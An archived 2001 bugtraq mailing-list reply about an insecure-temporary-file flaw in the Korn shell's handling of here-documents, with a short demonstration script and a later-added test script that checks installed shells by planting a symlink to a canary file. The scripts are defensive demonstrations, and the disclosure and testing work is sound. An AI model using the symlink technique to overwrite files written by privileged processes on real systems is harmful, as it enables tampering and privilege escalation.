[22437] in bugtraq


Re: Solaris Patchadd symlink exploit.

daemon@ATHENA.MIT.EDU (Paul Szabo)
Mon Aug 27 17:43:17 2001

Date: Tue, 28 Aug 2001 07:06:08 +1000 (EST)
From: psz@maths.usyd.edu.au (Paul Szabo)
Message-Id: <200108272106.f7RL68V400699@milan.maths.usyd.edu.au>
To: bugtraq@securityfocus.com, lwc@Vapid.dhs.org

> Here is an exploit to an old bug for patchadd in Solaris. ...
> #See BID http://www.securityfocus.com/bid/2127

The bug is not in the patchadd script, but in the Korn shell ksh that
creates "here documents" insecurely.

Demonstration (ksh is vulnerable if the size of silly.1 is changed):

#!/bin/ksh -x
# Canary file: it stays empty unless ksh writes through the symlink.
touch /tmp/silly.1
# ksh spools here-documents to the predictable name /tmp/sh<pid>.N;
# plant a symlink under that name pointing at the canary.
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
cat <<EOF
Just some short text
EOF
# If silly.1 now has a non-zero size, the here-document went through the symlink.
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*

Note that there is a similar bug in the Bourne shell sh. For a historical
perspective see articles:

http://www.securityfocus.com/templates/archive.pike?list=1&msg=200011230225.NAA19716@milan.maths.usyd.edu.au
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012190800.TAA05385@milan.maths.usyd.edu.au
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202213.JAA03182@milan.maths.usyd.edu.au
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202211.JAA25620@milan.maths.usyd.edu.au

Cheers,

Paul Szabo - psz@maths.usyd.edu.au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia
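A check that runs the here-document demonstration above inside any shell you name and reports whether the body was written through a planted symlink, added here as an example and not part of the original post. It assumes an affected shell uses the scratch-file name /tmp/sh<pid>.1 shown above and that /tmp is writable; the canary file itself is kept in a private mktemp directory.

```shell
#!/bin/sh
# Added check, not from Paul Szabo's post: run the post's here-document
# demonstration inside each shell named on the command line and report
# whether the here-document body was written through a planted symlink.
# Assumptions: an affected shell spools here-documents to /tmp/sh<pid>.1
# (the name used in the post) and /tmp is writable.  Only the symlink is
# created in /tmp, and it is removed afterwards.

# Returns 0 if the shell wrote the here-document through the symlink,
# 1 if the canary stayed empty, 2 if the check could not be run.
heredoc_follows_symlink() {
    shell=$1
    command -v "$shell" >/dev/null 2>&1 || return 2
    workdir=$(mktemp -d) || return 2
    canary=$workdir/canary
    : > "$canary"
    # Single-quoted so that $$ expands to the PID of the shell under test,
    # which is the PID an affected shell would put in its scratch-file name.
    "$shell" -c '
ln -s "$1" "/tmp/sh$$.1" || exit 2
cat <<EOF >/dev/null
Just some short text
EOF
rm -f "/tmp/sh$$.1"
' sh "$canary"
    rc=$?
    if [ "$rc" -eq 2 ]; then
        result=2
    elif [ -s "$canary" ]; then
        result=0
    else
        result=1
    fi
    rm -rf "$workdir"
    return "$result"
}

for shell in "$@"; do
    rc=0
    heredoc_follows_symlink "$shell" || rc=$?
    case $rc in
        0) echo "$shell: here-document written through the symlink (affected)" ;;
        1) echo "$shell: canary untouched (not affected)" ;;
        *) echo "$shell: could not run the check" ;;
    esac
done
```

Run it as `sh check.sh /bin/sh /bin/ksh /bin/bash` to test each installed shell in turn; a shell that is not installed is reported as untestable rather than as safe.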
